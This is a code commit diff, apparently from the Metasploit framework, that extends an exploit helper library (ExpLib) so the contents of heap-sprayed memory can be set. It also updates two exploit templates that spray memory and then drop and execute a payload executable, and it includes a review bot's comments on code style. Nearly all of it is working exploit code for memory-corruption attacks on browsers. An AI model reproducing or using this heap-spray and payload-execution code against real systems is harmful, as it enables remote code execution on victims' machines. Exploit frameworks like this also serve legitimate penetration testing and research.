Allow easier control of sprayed memory
parent
0523d9e625
commit
ce02f8a7c5
@ -8,6 +8,10 @@ ExpLib = (function() {
this.base = base;
this.arr_size = arr_size;
this.arr_arr = null;
// Allows to control the contents of the sprayed memory.
// Have into account some array positions will be corrupted
// while leaking and modifying things.
this.arr_contents = [];
|
this.payload = payload;
this.modules = {}
|
@ -35,7 +39,6 @@ ExpLib = (function() {
return module;
}
|
|
ExpLib.prototype.spray = function() {
this.arr_arr = new Array( num_arrays );
|
|
@ -50,14 +53,20 @@ ExpLib = (function() {
|
for ( var i = 0; i < num_arrays; ++ i ) {
this.arr_arr[i] = eval(decl);
this.arr_arr[i][0] = 0x21212121;
this.arr_arr[i][1] = 0x22222222;
this.arr_arr[i][2] = 0x23232323;
this.arr_arr[i][3] = 0x24242424;
for(var j = 0; j < this.arr_contents.length; j++) {
this.arr_arr[i][j] = this.arr_contents[j];
}
}
|
}
|
// Should be used before calling spray()
ExpLib.prototype.setArrContents = function(contents) {
for(var i = 0; i < this.arr_size && i < contents.length; i++) {
this.arr_contents[i] = contents[i];
}
}
|
ExpLib.prototype.setValue = function(i1, i2, v) {
this.arr_arr[i1][i2] = v;
}
|
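Review bot: In spray(), the four literal slot writes just above the new `for(var j = 0; j < this.arr_contents.length; j++)` loop are dead whenever setArrContents() was called first, and both callers on this page (the pe_exe hunk and the Metasploit3 hunk) now pass exactly those same four values, so the literals only survive as an undocumented fallback for a caller that never sets contents. Either drop them or state that intent above them, e.g. `// Default slot values; overwritten by arr_contents below when it was set.` setArrContents() also silently keeps at most arr_size entries and, when called a second time with a shorter array, leaves the earlier entries in place, which its header comment should say: `// Should be used before calling spray(); at most arr_size entries are kept and earlier entries are not cleared.` The new constructor comment reads more clearly as `// Note that some array slots are overwritten while leaking and modifying memory.` spray() begins in the previous hunk, so the third hunk opens mid-body.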
@ -63,7 +63,7 @@ var pe_exe = "<%= exe_js %>"
var num_arrays = 98688;
var arr_size = (0x1000 - 0x20)/4;
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_drop_exec(pe_exe) );
|
explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
explib.spray();
|
/*
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
var num_arrays = 98688;
var arr_size = (0x1000 - 0x20)/4;
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
|
explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
explib.spray();
|
/*
|